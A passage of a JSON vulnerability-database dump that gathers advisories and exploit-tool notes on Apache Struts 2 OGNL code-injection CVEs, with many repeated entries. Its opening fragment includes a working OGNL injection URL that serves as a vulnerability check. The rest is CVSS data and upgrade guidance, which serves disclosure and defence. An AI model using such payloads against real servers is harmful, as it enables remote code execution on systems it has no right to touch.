action="HelloWorld" includeParams="all">\r\n\r\n\u8fd0\u884c struts2-blank app\r\n\r\n\u8bbf\u95ee\u4e0b\u5217\u5730\u5740: http://localhost:8080/example/HelloWorld.action?fakeParam=%25%7B(%23_memberAccess%5B'allowStaticMethodAccess'%5D%3Dtrue)(%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse)(%23writer%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23writer.println('hacked')%2C%23writer.close())%7D\r\n\r\n\u5982\u679c\u8fd4\u56de"hacked"\uff0c\u5219\u53d7\u6b64\u6f0f\u6d1e\u5f71\u54cd\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-60807", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "github": [{"lastseen": "2022-07-06T19:57:46", "description": "Apache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2022-05-17T03:42:18", "type": "github", "title": "Improper Input Validation in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3093"], "modified": "2022-07-06T19:56:14", "id": "GHSA-383P-XQXX-RRMP", "href": "https://github.com/advisories/GHSA-383p-xqxx-rrmp", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-08T19:57:56", "description": "Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.", "cvss3": {}, "published": "2022-05-14T00:54:15", "type": "github", "title": "Improper Control of Generation of Code in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1965"], "modified": "2022-07-08T19:05:59", "id": "GHSA-WHMQ-V94Q-34P9", "href": "https://github.com/advisories/GHSA-whmq-v94q-34p9", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhatcve": [{"lastseen": "2021-07-29T04:47:43", "description": "Apache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-06-01T13:48:53", "type": "redhatcve", "title": "CVE-2016-3093", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3093"], "modified": "2020-04-08T22:27:46", "id": "RH:CVE-2016-3093", "href": "https://access.redhat.com/security/cve/cve-2016-3093", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "osv": [{"lastseen": "2022-08-15T08:54:48", "description": "Apache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2022-05-17T03:42:18", "type": "osv", "title": "Improper Input Validation in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3093"], "modified": "2022-08-15T08:54:33", "id": "OSV:GHSA-383P-XQXX-RRMP", "href": "https://osv.dev/vulnerability/GHSA-383p-xqxx-rrmp", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-15T08:22:21", "description": "Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.", "cvss3": {}, "published": "2022-05-14T00:54:15", "type": "osv", "title": "Improper Control of Generation of Code in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1965"], "modified": "2022-08-15T08:22:17", "id": "OSV:GHSA-WHMQ-V94Q-34P9", "href": "https://osv.dev/vulnerability/GHSA-whmq-v94q-34p9", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-10-03T15:02:00", "description": "Added: 07/18/2013 \nCVE: [CVE-2013-2115](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2115>) \nBID: [60167](<http://www.securityfocus.com/bid/60167>) \nOSVDB: [93645](<http://www.osvdb.org/93645>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.3.14.2 do not properly handle the includeParams attribute in URLs. This could allow remote attackers to execute arbitrary OGNL code via a crafted request. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23142>) to Struts 2.3.14.2 or higher. \n\n### References\n\n<http://struts.apache.org/development/2.x/docs/s2-014.html> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThis exploit requires that the Struts Action URL be provided. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-07-18T00:00:00", "type": "saint", "title": "Apache Struts URL includeParams Attribute OGNL Code Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-2115"], "modified": "2013-07-18T00:00:00", "id": "SAINT:828C60321F2ABC177EBA08F435872B1B", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/struts_url_includeparams_attribute_ognl_code_inj", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-29T16:40:28", "description": "Added: 07/18/2013 \nCVE: [CVE-2013-2115](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2115>) \nBID: [60167](<http://www.securityfocus.com/bid/60167>) \nOSVDB: [93645](<http://www.osvdb.org/93645>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.3.14.2 do not properly handle the includeParams attribute in URLs. This could allow remote attackers to execute arbitrary OGNL code via a crafted request. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23142>) to Struts 2.3.14.2 or higher. \n\n### References\n\n<http://struts.apache.org/development/2.x/docs/s2-014.html> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThis exploit requires that the Struts Action URL be provided. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2013-07-18T00:00:00", "type": "saint", "title": "Apache Struts URL includeParams Attribute OGNL Code Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2115"], "modified": "2013-07-18T00:00:00", "id": "SAINT:2158B27B9EAB9B393EED3784C4096BC1", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/struts_url_includeparams_attribute_ognl_code_inj", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:35", "description": "Added: 07/18/2013 \nCVE: [CVE-2013-2115](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2115>) \nBID: [60167](<http://www.securityfocus.com/bid/60167>) \nOSVDB: [93645](<http://www.osvdb.org/93645>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.3.14.2 do not properly handle the includeParams attribute in URLs. This could allow remote attackers to execute arbitrary OGNL code via a crafted request. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23142>) to Struts 2.3.14.2 or higher. \n\n### References\n\n<http://struts.apache.org/development/2.x/docs/s2-014.html> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThis exploit requires that the Struts Action URL be provided. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2013-07-18T00:00:00", "type": "saint", "title": "Apache Struts URL includeParams Attribute OGNL Code Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2115"], "modified": "2013-07-18T00:00:00", "id": "SAINT:1D34925730D76AB12F475B2A125AC017", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/struts_url_includeparams_attribute_ognl_code_inj", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-26T11:36:27", "description": "Added: 07/18/2013 \nCVE: [CVE-2013-2115](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2115>) \nBID: [60167](<http://www.securityfocus.com/bid/60167>) \nOSVDB: [93645](<http://www.osvdb.org/93645>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.3.14.2 do not properly handle the includeParams attribute in URLs. This could allow remote attackers to execute arbitrary OGNL code via a crafted request. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23142>) to Struts 2.3.14.2 or higher. \n\n### References\n\n<http://struts.apache.org/development/2.x/docs/s2-014.html> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThis exploit requires that the Struts Action URL be provided. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2013-07-18T00:00:00", "type": "saint", "title": "Apache Struts URL includeParams Attribute OGNL Code Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2115"], "modified": "2013-07-18T00:00:00", "id": "SAINT:D5D4A387859B0AFB11066636D506EF3B", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/struts_url_includeparams_attribute_ognl_code_inj", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-26T11:36:27", "description": "Added: 08/01/2013 \nCVE: [CVE-2013-2251](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251>) \nBID: [61189](<http://www.securityfocus.com/bid/61189>) \nOSVDB: [95405](<http://www.osvdb.org/95405>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. \n\n### Problem\n\nThe `**DefaultActionMapper**` in Struts 2 versions prior to 2.3.15.1 does not properly handle parameters with a crafted `**redirect:**` prefix. This could allow remote attackers to execute arbitrary OGNL code. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.3.15.1 or higher. \n\n### References\n\n<http://struts.apache.org/development/2.x/docs/s2-016.html> \n\n\n### Limitations\n\nThis exploit was tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThis exploit requires that the Struts Action URL be provided. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-08-01T00:00:00", "type": "saint", "title": "Apache Struts DefaultActionMapper redirect Prefix Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251"], "modified": "2013-08-01T00:00:00", "id": "SAINT:6A7FE32298A470E879AB2C759F6C43EB", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/struts_defaultactionmapper_redirect_prefix", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:59", "description": "Added: 08/01/2013 \nCVE: [CVE-2013-2251](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251>) \nBID: [61189](<http://www.securityfocus.com/bid/61189>) \nOSVDB: [95405](<http://www.osvdb.org/95405>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. \n\n### Problem\n\nThe `**DefaultActionMapper**` in Struts 2 versions prior to 2.3.15.1 does not properly handle parameters with a crafted `**redirect:**` prefix. This could allow remote attackers to execute arbitrary OGNL code. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.3.15.1 or higher. \n\n### References\n\n<http://struts.apache.org/development/2.x/docs/s2-016.html> \n\n\n### Limitations\n\nThis exploit was tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThis exploit requires that the Struts Action URL be provided. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-08-01T00:00:00", "type": "saint", "title": "Apache Struts DefaultActionMapper redirect Prefix Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-2251"], "modified": "2013-08-01T00:00:00", "id": "SAINT:2FE5CCE51B64707F8D205A80240A6467", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/struts_defaultactionmapper_redirect_prefix", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-28T14:33:33", "description": "Added: 08/01/2013 \nCVE: [CVE-2013-2251](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251>) \nBID: [61189](<http://www.securityfocus.com/bid/61189>) \nOSVDB: [95405](<http://www.osvdb.org/95405>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. \n\n### Problem\n\nThe `**DefaultActionMapper**` in Struts 2 versions prior to 2.3.15.1 does not properly handle parameters with a crafted `**redirect:**` prefix. This could allow remote attackers to execute arbitrary OGNL code. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.3.15.1 or higher. \n\n### References\n\n<http://struts.apache.org/development/2.x/docs/s2-016.html> \n\n\n### Limitations\n\nThis exploit was tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThis exploit requires that the Struts Action URL be provided. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-08-01T00:00:00", "type": "saint", "title": "Apache Struts DefaultActionMapper redirect Prefix Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251"], "modified": "2013-08-01T00:00:00", "id": "SAINT:279F8312DEF0028C5D034325A810E73D", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/struts_defaultactionmapper_redirect_prefix", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-29T16:40:18", "description": "Added: 08/01/2013 \nCVE: [CVE-2013-2251](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251>) \nBID: [61189](<http://www.securityfocus.com/bid/61189>) \nOSVDB: [95405](<http://www.osvdb.org/95405>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. \n\n### Problem\n\nThe `**DefaultActionMapper**` in Struts 2 versions prior to 2.3.15.1 does not properly handle parameters with a crafted `**redirect:**` prefix. This could allow remote attackers to execute arbitrary OGNL code. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.3.15.1 or higher. \n\n### References\n\n<http://struts.apache.org/development/2.x/docs/s2-016.html> \n\n\n### Limitations\n\nThis exploit was tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThis exploit requires that the Struts Action URL be provided. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-08-01T00:00:00", "type": "saint", "title": "Apache Struts DefaultActionMapper redirect Prefix Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251"], "modified": "2013-08-01T00:00:00", "id": "SAINT:8B8924409E9AFE277FF0998CBA641AF8", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/struts_defaultactionmapper_redirect_prefix", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:53", "description": "Added: 08/05/2010 \nCVE: [CVE-2010-1870](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1870>) \nBID: [41592](<http://www.securityfocus.com/bid/41592>) \nOSVDB: [66280](<http://www.osvdb.org/66280>) \n\n\n### Background\n\n[Apache Struts](<http://projects.apache.org/projects/struts.html>) is a Java web application framework. Apache Struts version 2 is based on WebWork 2. WebWork 2 uses XWork to invoke actions based on HTTP parameter names. The ParameterInterceptor component of XWork runs the appropriate Java method to handle each input parameter. \n\n### Problem\n\nA security bypass vulnerability exists in the ParameterInterceptor. A remote attacker could execute arbitrary commands by setting various OGNL context variables using unicode strings in parameter names. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/downloads.html>) to Apache Struts 2.2 or higher when available. \n\n### References\n\n<http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html> \n\n\n### Limitations\n\nExploit works on Apache Struts 2.1.8.1. The specified share must be accessible by the target. \n\nBefore the exploit can succeed, exploit.exe must be placed on the specified share. Use the Download Connection or E-mail Attachment Execution exploit tool to obtain exploit.exe, using the same shell port as used with this exploit. Due to this requirement, this exploit must be run individually and is not included during an automated penetration test. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2010-08-05T00:00:00", "type": "saint", "title": "Apache Struts2 XWork ParameterInterceptor security bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-1870"], "modified": "2010-08-05T00:00:00", "id": "SAINT:6E895851192B9E656298357DF24A9556", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/struts_xwork_parameterinterceptor", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2021-07-28T14:33:22", "description": "Added: 08/05/2010 \nCVE: [CVE-2010-1870](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1870>) \nBID: [41592](<http://www.securityfocus.com/bid/41592>) \nOSVDB: [66280](<http://www.osvdb.org/66280>) \n\n\n### Background\n\n[Apache Struts](<http://projects.apache.org/projects/struts.html>) is a Java web application framework. Apache Struts version 2 is based on WebWork 2. WebWork 2 uses XWork to invoke actions based on HTTP parameter names. The ParameterInterceptor component of XWork runs the appropriate Java method to handle each input parameter. \n\n### Problem\n\nA security bypass vulnerability exists in the ParameterInterceptor. A remote attacker could execute arbitrary commands by setting various OGNL context variables using unicode strings in parameter names. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/downloads.html>) to Apache Struts 2.2 or higher when available. \n\n### References\n\n<http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html> \n\n\n### Limitations\n\nExploit works on Apache Struts 2.1.8.1. The specified share must be accessible by the target. \n\nBefore the exploit can succeed, exploit.exe must be placed on the specified share. Use the Download Connection or E-mail Attachment Execution exploit tool to obtain exploit.exe, using the same shell port as used with this exploit. Due to this requirement, this exploit must be run individually and is not included during an automated penetration test. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2010-08-05T00:00:00", "type": "saint", "title": "Apache Struts2 XWork ParameterInterceptor security bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1870"], "modified": "2010-08-05T00:00:00", "id": "SAINT:4558D86B32E9DFCF5B5EEBFCAB072C31", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/struts_xwork_parameterinterceptor", "cvss": {"score": 5.0, "vector": 